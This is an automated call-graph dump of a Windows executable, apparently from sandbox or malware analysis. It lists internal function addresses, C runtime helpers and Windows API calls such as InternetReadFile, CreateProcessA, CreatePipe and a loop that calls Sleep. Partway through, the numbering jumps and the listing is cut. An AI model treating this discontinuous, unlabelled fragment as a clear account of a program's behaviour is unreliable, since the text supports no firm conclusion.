109455 b259a0 __dosmaperr 20 API calls 109453->109455 109459 b356ca 109454->109459 109460 b356ad 109454->109460 109458 b3565f 109455->109458 109457 b35830 109457->109445 109462 b259b3 __Stollx 20 API calls 109458->109462 109463 b356e0 109459->109463 109505 b38ff6 109459->109505 109461 b259a0 __dosmaperr 20 API calls 109460->109461 109464 b356b2 109461->109464 109465 b35666 109462->109465 109508 b351cd 109463->109508 109468 b259b3 __Stollx 20 API calls 109464->109468 109522 b25122 26 API calls __cftof 109465->109522 109471 b356ba 109468->109471 109523 b25122 26 API calls __cftof 109471->109523 109472 b35727 109475 b35781 WriteFile 109472->109475 109476 b3573b 109472->109476 109473 b356ee 109477 b356f2 109473->109477 109478 b35714 109473->109478 109480 b357a4 GetLastError 109475->109480 109486 b3570a 109475->109486 109482 b35743 109476->109482 109483 b35771 109476->109483 109479 b357e8 109477->109479 109524 b35160 GetLastError WriteConsoleW CreateFileW __wsopen_s 109477->109524 109525 b34fad 71 API calls 3 library calls 109478->109525 109479->109452 109489 b259b3 __Stollx 20 API calls 109479->109489 109480->109486 109487 b35761 109482->109487 109488 b35748 109482->109488 109515 b35243 109483->109515 109486->109452 109486->109479 109494 b357c4 109486->109494 109527 b35410 8 API calls 2 library calls 109487->109527 109488->109479 109490 b35751 109488->109490 109493 b3580d 109489->109493 109526 b35322 7 API calls 2 library calls 109490->109526 109492 b3575f 109492->109486 109496 b259a0 __dosmaperr 20 API calls 109493->109496 109497 b357cb 109494->109497 109498 b357df 109494->109498 109496->109452 109500 b259b3 __Stollx 20 API calls 109497->109500 109528 b2597d 20 API calls 3 library calls 109498->109528 109501 b357d0 109500->109501 109502 b259a0 __dosmaperr 20 API calls 109501->109502 109502->109452 109503->109442 109504->109442 109536 b38f5d 109505->109536 109546 b3fc47 109508->109546 109510 b351dd 109511 b351e2 109510->109511 109555 b3437a GetLastError 109510->109555 
109511->109472 109511->109473 109513 b35205 109513->109511 109514 b35223 GetConsoleMode 109513->109514 109514->109511 109520 b35252 __wsopen_s 109515->109520 109516 b35305 109517 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 109516->109517 109521 b3531e 109517->109521 109518 b352c4 WriteFile 109519 b35307 GetLastError 109518->109519 109518->109520 109519->109516 109520->109516 109520->109518 109521->109486 109522->109452 109523->109452 109524->109486 109525->109486 109526->109492 109527->109492 109528->109452 109530 b005c4 109529->109530 109531 b005c6 IsProcessorFeaturePresent 109529->109531 109530->109457 109533 b017a9 109531->109533 109580 b0176d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 109533->109580 109535 b0188c 109535->109457 109537 b3ce21 __wsopen_s 26 API calls 109536->109537 109538 b38f6f 109537->109538 109539 b38f77 109538->109539 109540 b38f88 SetFilePointerEx 109538->109540 109543 b259b3 __Stollx 20 API calls 109539->109543 109541 b38fa0 GetLastError 109540->109541 109542 b38f7c 109540->109542 109545 b2597d 20 API calls 3 library calls 109541->109545 109542->109463 109543->109542 109545->109542 109547 b3fc54 109546->109547 109549 b3fc61 109546->109549 109548 b259b3 __Stollx 20 API calls 109547->109548 109550 b3fc59 109548->109550 109551 b3fc6d 109549->109551 109552 b259b3 __Stollx 20 API calls 109549->109552 109550->109510 109551->109510 109553 b3fc8e 109552->109553 109575 b25122 26 API calls __cftof 109553->109575 109556 b34390 109555->109556 109557 b34396 109555->109557 109576 b32fe9 11 API calls 2 library calls 109556->109576 109559 b34d09 __dosmaperr 20 API calls 109557->109559 109561 b343e5 SetLastError 109557->109561 109560 b343a8 109559->109560 109566 b343b0 109560->109566 109577 b3303f 11 API calls 2 library calls 109560->109577 109561->109513 109563 b34d66 _free 20 API calls 
109565 b343b6 109563->109565 109564 b343c5 109564->109566 109567 b343cc 109564->109567 109568 b343f1 SetLastError 109565->109568 109566->109563 109578 b341ec 20 API calls __dosmaperr 109567->109578 109579 b2ca79 64 API calls _abort 109568->109579 109570 b343d7 109572 b34d66 _free 20 API calls 109570->109572 109574 b343de 109572->109574 109574->109561 109574->109568 109575->109550 109576->109557 109577->109564 109578->109570 109580->109535 109581->109422 109583 b24f74 ListArray ___scrt_fastfail 109582->109583 109584 b24fa0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 109583->109584 109587 b25071 ___scrt_fastfail 109584->109587 109585 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 109586 b2508f GetCurrentProcess TerminateProcess 109585->109586 109586->109063 109587->109585 109588 a86808 InternetReadFile 109589 a86800 SimpleUString::operator= 109588->109589 109589->109588 109593 a862ad messages 109589->109593 109598 aabba0 109589->109598 109591 a869cd 109610 b25132 109591->109610 109593->109591 109596 a862fb messages 109593->109596 109594 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 109597 a866b2 109594->109597 109596->109594 109599 aabbcb 109598->109599 109600 aabcee 109598->109600 109603 aabc3c 109599->109603 109604 aabc12 109599->109604 109623 aadba0 28 API calls SimpleUString::operator= 109600->109623 109602 b25132 messages 26 API calls 109605 aabcf8 109602->109605 109608 aabc23 _Yarn 109603->109608 109615 b0089a 109603->109615 109606 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 109604->109606 109606->109608 109608->109602 109609 aabcac _Yarn messages 109608->109609 109609->109589 109634 b250a7 26 API calls 4 library calls 
109610->109634 109612 b25141 109613 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109612->109613 109614 b2514e 109613->109614 109618 b0089f 109615->109618 109617 b008b9 109617->109608 109618->109617 109620 b008bb Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 109618->109620 109624 b2ac7c 109618->109624 109631 b2cfdd 7 API calls 2 library calls 109618->109631 109632 b17e0c RaiseException 109620->109632 109622 b01b6e 109629 b35b94 std::_Locinfo::_W_Getmonths 109624->109629 109625 b35bd2 109626 b259b3 __Stollx 20 API calls 109625->109626 109628 b35bd0 109626->109628 109627 b35bbd RtlAllocateHeap 109627->109628 109627->109629 109628->109618 109629->109625 109629->109627 109633 b2cfdd 7 API calls 2 library calls 109629->109633 109631->109618 109632->109622 109633->109629 109634->109612 109635 b25182 109636 b36b4b 77 API calls 109635->109636 109637 b251ae 109636->109637 109638 b251be 109637->109638 109639 b25277 109637->109639 109640 b251c2 109638->109640 109641 b251df 109638->109641 109642 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109639->109642 109643 b251d4 109640->109643 109646 b36e62 33 API calls 109640->109646 109641->109643 109647 b259b3 __Stollx 20 API calls 109641->109647 109645 b25281 109642->109645 109644 b34d66 _free 20 API calls 109643->109644 109648 b25263 109644->109648 109646->109643 109649 b251fb 109647->109649 109650 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 109648->109650 109651 b259b3 __Stollx 20 API calls 109649->109651 109652 b25273 109650->109652 109653 b25202 109651->109653 109654 b259b3 __Stollx 20 API calls 109653->109654 109655 b2521c 109654->109655 109655->109643 109656 b25231 109655->109656 109657 b259b3 __Stollx 20 API calls 109655->109657 109656->109643 109658 b259b3 __Stollx 20 API calls 109656->109658 109657->109656 109658->109643 109659 b376c2 109660 b376d2 
109659->109660 109661 b376ea 109659->109661 109662 b259b3 __Stollx 20 API calls 109660->109662 109661->109660 109669 b37701 _strrchr 109661->109669 109663 b376d7 109662->109663 109768 b25122 26 API calls __cftof 109663->109768 109665 b376e2 109666 b377b2 _strrchr 109667 b37802 109666->109667 109668 b377d8 109666->109668 109673 b34d09 __dosmaperr 20 API calls 109667->109673 109670 b36e62 33 API calls 109668->109670 109669->109666 109669->109669 109672 b34d09 __dosmaperr 20 API calls 109669->109672 109671 b377df 109670->109671 109676 b377f8 109671->109676 109705 b378dd 109671->109705 109675 b3775f 109672->109675 109674 b3781c 109673->109674 109678 b37824 109674->109678 109682 b321c2 ___std_exception_copy 26 API calls 109674->109682 109679 b3776a 109675->109679 109680 b37778 109675->109680 109681 b34d66 _free 20 API calls 109676->109681 109686 b34d66 _free 20 API calls 109678->109686 109683 b34d66 _free 20 API calls 109679->109683 109684 b321c2 ___std_exception_copy 26 API calls 109680->109684 109681->109665 109685 b37838 109682->109685 109683->109665 109687 b37786 109684->109687 109688 b37843 109685->109688 109689 b378d0 109685->109689 109686->109676 109687->109689 109692 b36be9 26 API calls 109687->109692 109691 b259b3 __Stollx 20 API calls 109688->109691 109690 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109689->109690 109693 b378dc 109690->109693 109698 b37853 109691->109698 109694 b3779b 109692->109694 109694->109689 109696 b34d66 _free 20 API calls 109694->109696 109695 b321c2 ___std_exception_copy 26 API calls 109695->109698 109696->109666 109697 b36e62 33 API calls 109697->109698 109698->109695 109698->109697 109699 b3789b 109698->109699 109701 b3788f 109698->109701 109700 b259b3 __Stollx 20 API calls 109699->109700 109703 b378a0 109700->109703 109702 b34d66 _free 20 API calls 109701->109702 109702->109676 109704 b378dd 71 API calls 109703->109704 109704->109678 109706 b37903 109705->109706 109707 b378eb 109705->109707 109706->109707 109710 b37919 
109706->109710 109711 b3790f 109706->109711 109708 b259b3 __Stollx 20 API calls 109707->109708 109709 b378f0 109708->109709 109777 b25122 26 API calls __cftof 109709->109777 109769 b423d6 109710->109769 109714 b259a0 __dosmaperr 20 API calls 109711->109714 109714->109707 109716 b37940 109718 b34d66 _free 20 API calls 109716->109718 109717 b37957 109774 b3769a 109717->109774 109720 b37948 109718->109720 109722 b34d66 _free 20 API calls 109720->109722 109725 b378fb 109722->109725 109723 b37991 109726 b34d66 _free 20 API calls 109723->109726 109724 b379b9 109727 b259a0 __dosmaperr 20 API calls 109724->109727 109725->109676 109728 b37999 109726->109728 109729 b379ca ListArray 109727->109729 109730 b34d66 _free 20 API calls 109728->109730 109732 b379db CreateProcessA 109729->109732 109731 b379a4 109730->109731 109733 b34d66 _free 20 API calls 109731->109733 109734 b37a18 GetLastError 109732->109734 109735 b37a3d 109732->109735 109733->109725 109778 b2597d 20 API calls 3 library calls 109734->109778 109736 b37afb 109735->109736 109737 b37a49 109735->109737 109779 b20f95 60 API calls _abort 109736->109779 109739 b37a83 109737->109739 109740 b37a4d WaitForSingleObject GetExitCodeProcess 109737->109740 109746 b37ac4 109739->109746 109747 b37a88 109739->109747 109744 b37a73 109740->109744 109745 b37a6c CloseHandle 109740->109745 109742 b37a24 109748 b37a30 109742->109748 109749 b37a29 CloseHandle 109742->109749 109743 b37b02 109750 b37a77 CloseHandle 109744->109750 109751 b37a7e 109744->109751 109745->109744 109752 b37ac8 CloseHandle 109746->109752 109753 b37acf 109746->109753 109754 b37a93 109747->109754 109755 b37a8c CloseHandle 109747->109755 109748->109751 109756 b37a34 CloseHandle 109748->109756 109749->109748 109750->109751 109759 b34d66 _free 20 API calls 109751->109759 109752->109753 109757 b34d66 _free 20 API calls 109753->109757 109754->109751 109758 b37a97 CloseHandle 109754->109758 109755->109754 109756->109751 109760 b37ad7 109757->109760 109758->109751 109761 
b37aa8 109759->109761 109762 b34d66 _free 20 API calls 109760->109762 109763 b34d66 _free 20 API calls 109761->109763 109765 b37ae3 109762->109765 109764 b37ab4 109763->109764 109766 b34d66 _free 20 API calls 109764->109766 109767 b34d66 _free 20 API calls 109765->109767 109766->109725 109767->109725 109768->109665 109780 b4205d 109769->109780 109772 b34d66 _free 20 API calls 109773 b37936 109772->109773 109773->109716 109773->109717 109797 b37649 109774->109797 109776 b376be 109776->109723 109776->109724 109777->109725 109778->109742 109779->109743 109781 b42079 109780->109781 109782 b34d09 __dosmaperr 20 API calls 109781->109782 109783 b420a7 109782->109783 109784 b420af 109783->109784 109789 b420c3 109783->109789 109796 b2597d 20 API calls 3 library calls 109784->109796 109786 b420bc 109790 b34d66 _free 20 API calls 109786->109790 109787 b321c2 ___std_exception_copy 26 API calls 109787->109789 109788 b420b6 109791 b259b3 __Stollx 20 API calls 109788->109791 109789->109786 109789->109787 109792 b42118 109789->109792 109793 b4210e 109790->109793 109791->109786 109794 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109792->109794 109793->109772 109795 b42124 109794->109795 109796->109788 109798 b37655 __FrameHandler3::FrameUnwindToState 109797->109798 109805 b2c20b EnterCriticalSection 109798->109805 109800 b37663 109806 b37b03 109800->109806 109804 b37681 std::_Locinfo::_Locinfo_dtor 109804->109776 109805->109800 109809 b37b2c 109806->109809 109807 b37b6a 109811 b34d09 __dosmaperr 20 API calls 109807->109811 109808 b37b58 109810 b259b3 __Stollx 20 API calls 109808->109810 109809->109807 109809->109808 109812 b37670 109810->109812 109813 b37b7e 109811->109813 109817 b3768e 109812->109817 109814 b259b3 __Stollx 20 API calls 109813->109814 109816 b37b8c 109813->109816 109814->109816 109815 b34d66 _free 20 API calls 109815->109812 109816->109815 109820 b2c253 LeaveCriticalSection 109817->109820 109819 b37698 109819->109804 109820->109819 109821 b36eb7 109822 b36ec3 
__FrameHandler3::FrameUnwindToState 109821->109822 109823 b36ef2 109822->109823 109824 b36ed1 109822->109824 109825 b36f0d 109823->109825 109829 b36f3d CreatePipe 109823->109829 109826 b259a0 __dosmaperr 20 API calls 109824->109826 109827 b259a0 __dosmaperr 20 API calls 109825->109827 109828 b36ed6 109826->109828 109830 b36f12 109827->109830 109831 b259b3 __Stollx 20 API calls 109828->109831 109832 b36f6f GetLastError 109829->109832 109833 b36f7e 109829->109833 109834 b259b3 __Stollx 20 API calls 109830->109834 109835 b36ede 109831->109835 109886 b2597d 20 API calls 3 library calls 109832->109886 109887 b3cc7e 109833->109887 109838 b36f1a 109834->109838 109884 b25122 26 API calls __cftof 109835->109884 109885 b25122 26 API calls __cftof 109838->109885 109840 b36f83 109842 b36f8c 109840->109842 109900 b37023 LeaveCriticalSection __wsopen_s 109840->109900 109843 b259b3 __Stollx 20 API calls 109842->109843 109845 b36f91 109843->109845 109847 b259a0 __dosmaperr 20 API calls 109845->109847 109846 b36ff4 109848 b3cc7e __wsopen_s 24 API calls 109846->109848 109850 b36f9c CloseHandle CloseHandle 109847->109850 109851 b36ff9 109848->109851 109849 b36ee9 std::_Locinfo::_Locinfo_dtor 109850->109849 109851->109842 109852 b3702b 109851->109852 109901 b37133 LeaveCriticalSection __wsopen_s 109852->109901 109854 b37071 109902 b3046e 26 API calls 2 library calls 109854->109902 109856 b3707d 109857 b3713b 109856->109857 109859 b37086 109856->109859 109858 b2514f std::_Locinfo::_W_Getmonths 11 API calls 109857->109858 109862 b37145 __FrameHandler3::FrameUnwindToState 109858->109862 109903 b3cbc7 109859->109903 109863 b3716e 109862->109863 109864 b3715e 109862->109864 109867 b37186 109863->109867 109868 b37176 109863->109868 109866 b259b3 __Stollx 20 API calls 109864->109866 109865 b3cbc7 __wsopen_s 21 API calls 109865->109849 109869 b37163 109866->109869 109871 b37226 109867->109871 109874 b371b8 109867->109874 109870 b259b3 __Stollx 20 API calls 109868->109870 109913 b25122 26 API 
calls __cftof 109869->109913 109876 b3717b std::_Locinfo::_Locinfo_dtor 109870->109876 109872 b259b3 __Stollx 20 API calls 109871->109872 109872->109869 109875 b34680 71 API calls 109874->109875 109877 b371c4 109875->109877 109877->109876 109878 b34523 std::_Xfsopen 23 API calls 109877->109878 109879 b371dd 109878->109879 109880 b371f2 109879->109880 109881 b371e5 109879->109881 109912 b3721c LeaveCriticalSection std::_Xfsopen 109880->109912 109882 b259b3 __Stollx 20 API calls 109881->109882 109882->109876 109884->109849 109885->109849 109886->109849 109888 b3cc8a __FrameHandler3::FrameUnwindToState 109887->109888 109914 b2c20b EnterCriticalSection 109888->109914 109890 b3cc91 109891 b3ccb6 109890->109891 109896 b3cd24 EnterCriticalSection 109890->109896 109897 b3ccd8 109890->109897 109918 b3ca5d 21 API calls 3 library calls 109891->109918 109894 b3cd01 std::_Locinfo::_Locinfo_dtor 109894->109840 109895 b3ccbb 109895->109897 109919 b3cba4 EnterCriticalSection 109895->109919 109896->109897 109898 b3cd31 LeaveCriticalSection 109896->109898 109915 b3cd87 109897->109915 109898->109890 109900->109846 109901->109854 109902->109856 109904 b3cbd6 109903->109904 109905 b3cc3f 109903->109905 109904->109905 109910 b3cbfc __wsopen_s 109904->109910 109906 b259b3 __Stollx 20 API calls 109905->109906 109907 b3cc44 109906->109907 109908 b259a0 __dosmaperr 20 API calls 109907->109908 109909 b37110 109908->109909 109909->109865 109910->109909 109911 b3cc26 SetStdHandle 109910->109911 109911->109909 109912->109876 109913->109876 109914->109890 109920 b2c253 LeaveCriticalSection 109915->109920 109917 b3cd8e 109917->109894 109918->109895 109919->109897 109920->109917 109921 b372f6 109922 b37303 109921->109922 109926 b3731b 109921->109926 109923 b259b3 __Stollx 20 API calls 109922->109923 109924 b37308 109923->109924 109971 b25122 26 API calls __cftof 109924->109971 109927 b37313 109926->109927 109928 b37376 109926->109928 109972 b35b37 109926->109972 109930 b336a5 __fread_nolock 26 API 
calls 109928->109930 109931 b3738e 109930->109931 109941 b38990 109931->109941 109933 b37395 109933->109927 109934 b336a5 __fread_nolock 26 API calls 109933->109934 109935 b373c1 109934->109935 109935->109927 109936 b336a5 __fread_nolock 26 API calls 109935->109936 109937 b373cf 109936->109937 109937->109927 109938 b336a5 __fread_nolock 26 API calls 109937->109938 109939 b373df 109938->109939 109940 b336a5 __fread_nolock 26 API calls 109939->109940 109940->109927 109942 b3899c __FrameHandler3::FrameUnwindToState 109941->109942 109943 b389a4 109942->109943 109944 b389bc 109942->109944 109946 b259a0 __dosmaperr 20 API calls 109943->109946 109945 b38a82 109944->109945 109950 b389f5 109944->109950 109947 b259a0 __dosmaperr 20 API calls 109945->109947 109948 b389a9 109946->109948 109951 b38a87 109947->109951 109949 b259b3 __Stollx 20 API calls 109948->109949 109960 b389b1 std::_Locinfo::_Locinfo_dtor 109949->109960 109952 b38a04 109950->109952 109953 b38a19 109950->109953 109954 b259b3 __Stollx 20 API calls 109951->109954 109955 b259a0 __dosmaperr 20 API calls 109952->109955 109977 b3cba4 EnterCriticalSection 109953->109977 109957 b38a11 109954->109957 109958 b38a09 109955->109958 110044 b25122 26 API calls __cftof 109957->110044 109961 b259b3 __Stollx 20 API calls 109958->109961 109959 b38a1f 109962 b38a50 109959->109962 109963 b38a3b 109959->109963 109960->109933 109961->109957 109978 b38aa3 109962->109978 109966 b259b3 __Stollx 20 API calls 109963->109966 109967 b38a40 109966->109967 109969 b259a0 __dosmaperr 20 API calls 109967->109969 109968 b38a4b 110043 b38a7a LeaveCriticalSection __wsopen_s 109968->110043 109969->109968 109971->109927 109973 b35b94 std::_Locinfo::_W_Getmonths 21 API calls 109972->109973 109974 b35b52 109973->109974 109975 b34d66 _free 20 API calls 109974->109975 109976 b35b5c 109975->109976 109976->109928 109977->109959 109979 b38ab5 109978->109979 109980 b38acd 109978->109980 109981 b259a0 __dosmaperr 20 API calls 109979->109981 109982 b38e37 
109980->109982 109987 b38b12 109980->109987 109983 b38aba 109981->109983 109984 b259a0 __dosmaperr 20 API calls 109982->109984 109985 b259b3 __Stollx 20 API calls 109983->109985 109986 b38e3c 109984->109986 109988 b38ac2 109985->109988 109989 b259b3 __Stollx 20 API calls 109986->109989 109987->109988 109990 b38b1d 109987->109990 109994 b38b4d 109987->109994 109988->109968 109991 b38b2a 109989->109991 109992 b259a0 __dosmaperr 20 API calls 109990->109992 110049 b25122 26 API calls __cftof 109991->110049 109993 b38b22 109992->109993 109996 b259b3 __Stollx 20 API calls 109993->109996 109997 b38b66 109994->109997 109998 b38ba8 109994->109998 109999 b38b8c 109994->109999 109996->109991 109997->109999 110034 b38b73 109997->110034 110001 b35b94 std::_Locinfo::_W_Getmonths 21 API calls 109998->110001 110000 b259a0 __dosmaperr 20 API calls 109999->110000 110002 b38b91 110000->110002 110003 b38bbf 110001->110003 110004 b259b3 __Stollx 20 API calls 110002->110004 110006 b34d66 _free 20 API calls 110003->110006 110007 b38b98 110004->110007 110005 b3fc47 __fread_nolock 26 API calls 110008 b38d11 110005->110008 110009 b38bc8 110006->110009 110045 b25122 26 API calls __cftof 110007->110045 110011 b38d87 110008->110011 110014 b38d2a GetConsoleMode 110008->110014 110012 b34d66 _free 20 API calls 110009->110012 110013 b38d8b ReadFile 110011->110013 110015 b38bcf 110012->110015 110016 b38da5 110013->110016 110017 b38dff GetLastError 110013->110017 110014->110011 110018 b38d3b 110014->110018 110019 b38bf4 110015->110019 110020 b38bd9 110015->110020 110016->110017 110029 b38d7c 110016->110029 110021 b38d63 110017->110021 110022 b38e0c 110017->110022 110018->110013 110023 b38d41 ReadConsoleW 110018->110023 110028 b38ff6 __wsopen_s 28 API calls 110019->110028 110026 b259b3 __Stollx 20 API calls 110020->110026 110024 b38ba3 __fread_nolock 110021->110024 110046 b2597d 20 API calls 3 library calls 110021->110046 110027 b259b3 __Stollx 20 API calls 110022->110027 110023->110029 110030 b38d5d 
a9c7d6 114227->114228 114229 a78780 97 API calls 114228->114229 114230 a9c7ee 114229->114230 114231 aa1ac0 collate 26 API calls 114230->114231 114232 a9c7f9 114231->114232 114233 a93dd0 28 API calls 114232->114233 114234 a9c7fe 114233->114234 114235 a78780 97 API calls 114234->114235 114236 a9c814 114235->114236 114237 aa12d0 28 API calls 114236->114237 114238 a9c843 114237->114238 114239 a83100 42 API calls 114238->114239 114243 a9c848 114239->114243 114240 a9c8b3 114241 a85d90 6 API calls 114240->114241 114242 a9c8bb 114241->114242 114244 a85d90 6 API calls 114242->114244 114243->114240 114247 aa12d0 28 API calls 114243->114247 114245 a9c8c5 114244->114245 114246 a85d90 6 API calls 114245->114246 114252 a9c8dc 114245->114252 114248 a9c8d2 114246->114248 114249 a9c88b 114247->114249 114250 a85d90 6 API calls 114248->114250 114251 aa12d0 28 API calls 114249->114251 114250->114252 114253 a9c89e 114251->114253 114254 aaa4d0 28 API calls 114252->114254 114255 a792a0 146 API calls 114253->114255 114256 a9c926 114254->114256 114255->114240 114257 aa1a90 28 API calls 114256->114257 114258 a9c93b 114257->114258 114259 a78a80 71 API calls 114258->114259 114260 a9c94c 114259->114260 114261 aa11d0 26 API calls 114260->114261 114262 a9c95a 114261->114262 114263 a749c0 52 API calls 114262->114263 114264 a9c965 114263->114264 114265 aaa4d0 28 API calls 114264->114265 114266 a9c999 114265->114266 114267 a78a80 71 API calls 114266->114267 114268 a9c9ae 114267->114268 114269 aa9d90 28 API calls 114268->114269 114270 a9c9be 114269->114270 114271 aa11d0 26 API calls 114270->114271 114272 a9c9cc 114271->114272 114273 a749c0 52 API calls 114272->114273 114274 a9c9d7 114273->114274 114275 a749c0 52 API calls 114274->114275 114276 a9c9e2 114275->114276 114277 a84500 31 API calls 114276->114277 114315 a9c9eb 114277->114315 114278 a9cad8 114280 aa12d0 28 API calls 114278->114280 114279 aa9b40 28 API calls 114279->114315 114281 a9caea 114280->114281 114283 a74a20 52 API calls 
114281->114283 114282 aa9c10 28 API calls 114282->114315 114284 a9caf9 114283->114284 114286 a749c0 52 API calls 114284->114286 114285 aa9ad0 28 API calls 114285->114315 114287 a9cb0e 114286->114287 114289 a9cb92 114287->114289 114291 aa9b40 28 API calls 114287->114291 114288 aa11d0 26 API calls 114288->114315 114290 aa9b40 28 API calls 114289->114290 114292 a9cba7 114290->114292 114293 a9cb2c 114291->114293 114294 a9cbbc 114292->114294 114295 a9cbb7 114292->114295 114296 aa9c10 28 API calls 114293->114296 114297 aa12d0 28 API calls 114294->114297 114997 a90fa0 137 API calls 3 library calls 114295->114997 114298 a9cb45 114296->114298 114300 a9cbce 114297->114300 114301 aa9ad0 28 API calls 114298->114301 114302 a74a20 52 API calls 114300->114302 114303 a9cb5e 114301->114303 114304 a9cbee 114302->114304 114305 aa11d0 26 API calls 114303->114305 114306 a9cc27 114304->114306 114309 aa12d0 28 API calls 114304->114309 114307 a9cb6d 114305->114307 114314 a9cc57 114306->114314 114318 a749c0 52 API calls 114306->114318 114310 a749c0 52 API calls 114307->114310 114308 aa12d0 28 API calls 114308->114315 114312 a9cc04 114309->114312 114313 a9cb78 114310->114313 114311 a74a20 52 API calls 114311->114315 114316 a74a20 52 API calls 114312->114316 114317 a749c0 52 API calls 114313->114317 114319 a749c0 52 API calls 114314->114319 114315->114278 114315->114279 114315->114282 114315->114285 114315->114288 114315->114308 114315->114311 114321 a749c0 52 API calls 114315->114321 114316->114306 114322 a9cb83 114317->114322 114318->114314 114320 a9cc78 114319->114320 114323 a9d02b ListArray 114320->114323 114324 a9cc85 114320->114324 114321->114315 114325 a749c0 52 API calls 114322->114325 114328 aa37b0 132 API calls 114323->114328 114326 aa12d0 28 API calls 114324->114326 114325->114289 114327 a9cc97 114326->114327 114329 a74a20 52 API calls 114327->114329 114330 a9d055 114328->114330 114331 a9cca6 114329->114331 114332 aa9130 92 API calls 114330->114332 114333 a749c0 52 API calls 
114331->114333 114334 a9d069 114332->114334 114335 a9ccbb 114333->114335 114337 aa3740 95 API calls 114334->114337 114341 a9ccd6 114335->114341 114998 aa11a0 28 API calls SimpleUString::operator= 114335->114998 114342 a9d086 ListArray 114337->114342 114338 aa12d0 28 API calls 114338->114341 114340 a9cd0d ListArray 114346 aa3b00 132 API calls 114340->114346 114341->114338 114341->114340 114343 a9cd04 Sleep 114341->114343 114999 a7aed0 132 API calls 4 library calls 114341->114999 114344 a85e60 30 API calls 114342->114344 114343->114341 114345 a9d11c 114344->114345 114347 ab5c80 22 API calls 114345->114347 114349 a9cd37 114346->114349 114348 a9d135 ListArray 114347->114348 114350 a9e5b0 30 API calls 114348->114350 115000 aaae30 28 API calls __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 114349->115000 114352 a9d15d ListArray 114350->114352 114356 a9e750 30 API calls 114352->114356 114353 a9cd6f 114354 aa3a90 95 API calls 114353->114354 114355 a9cd7e 114354->114355 114357 aa1bd0 _MREFOpen@16 28 API calls 114355->114357 114358 a9d188 114356->114358 114359 a9cd8e 114357->114359 114361 aa0230 28 API calls 114358->114361 114360 aa1bd0 _MREFOpen@16 28 API calls 114359->114360 114365 a9cda2 114360->114365 114362 a9d1a6 114361->114362 114363 ab2590 30 API calls 114362->114363 114364 a9d1bc 114363->114364 114366 aa0230 28 API calls 114364->114366 114368 aa1360 28 API calls 114365->114368 114367 a9d1d6 114366->114367 114369 ab23c0 30 API calls 114367->114369 114371 a9cde2 114368->114371 114370 a9d1ec 114369->114370 114374 a77e30 28 API calls 114370->114374 114372 aa1b10 26 API calls 114371->114372 114373 a9cded 114372->114373 114375 aa1ac0 collate 26 API calls 114373->114375 114376 a9d212 114374->114376 114377 a9cdf8 114375->114377 114378 aa1b10 26 API calls 114376->114378 114379 aa1360 28 API calls 114377->114379 114380 a9d21d 114378->114380 114381 a9ce14 114379->114381 
114382 aa1ac0 collate 26 API calls 114380->114382 114383 aa1b10 26 API calls 114381->114383 114384 a9d228 114382->114384 114385 a9ce1f 114383->114385 114387 aa1360 28 API calls 114384->114387 114386 aa1ac0 collate 26 API calls 114385->114386 114391 a9ce2a 114386->114391 114388 a9d240 114387->114388 114389 aa1360 28 API calls 114388->114389 114390 a9d260 114389->114390 114393 aa1a90 28 API calls 114390->114393 114392 aa1360 28 API calls 114391->114392 114396 a9ce6b 114392->114396 114394 a9d28c 114393->114394 114395 a83f00 30 API calls 114394->114395 114397 a9d2b4 114395->114397 114398 aaa5b0 28 API calls 114396->114398 114400 aa95d0 28 API calls 114397->114400 114399 a9cea5 114398->114399 115001 aa1170 28 API calls SimpleUString::operator= 114399->115001 114402 a9d2e7 114400->114402 114405 aa1b10 26 API calls 114402->114405 114403 a9ceb8 115002 aa11a0 28 API calls SimpleUString::operator= 114403->115002 114406 a9d2f5 114405->114406 114409 a9cec9 114410 aa1360 28 API calls 114409->114410 114890->114086 114891->114094 114892->114096 114893->114099 114894->114076 114895->114079 114896->114082 114897->114103 114898->114105 114903 b3c98d 114899->114903 114902 b1a21f 8 API calls 3 library calls 114902->114110 114904 b3c9aa 114903->114904 114907 b3c9a6 114903->114907 114904->114907 114909 b33b5d 114904->114909 114905 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 114906 b00a65 114905->114906 114906->114108 114906->114902 114907->114905 114910 b33b64 114909->114910 114911 b33ba7 GetStdHandle 114910->114911 114912 b33c0f 114910->114912 114913 b33bba GetFileType 114910->114913 114911->114910 114912->114904 114913->114910 114921 ade660 114914->114921 114916 a7198c 114930 ad4900 114916->114930 114920 a719b5 114920->114117 114922 ab4760 28 API calls 114921->114922 114923 ade697 114922->114923 114924 b0089a 
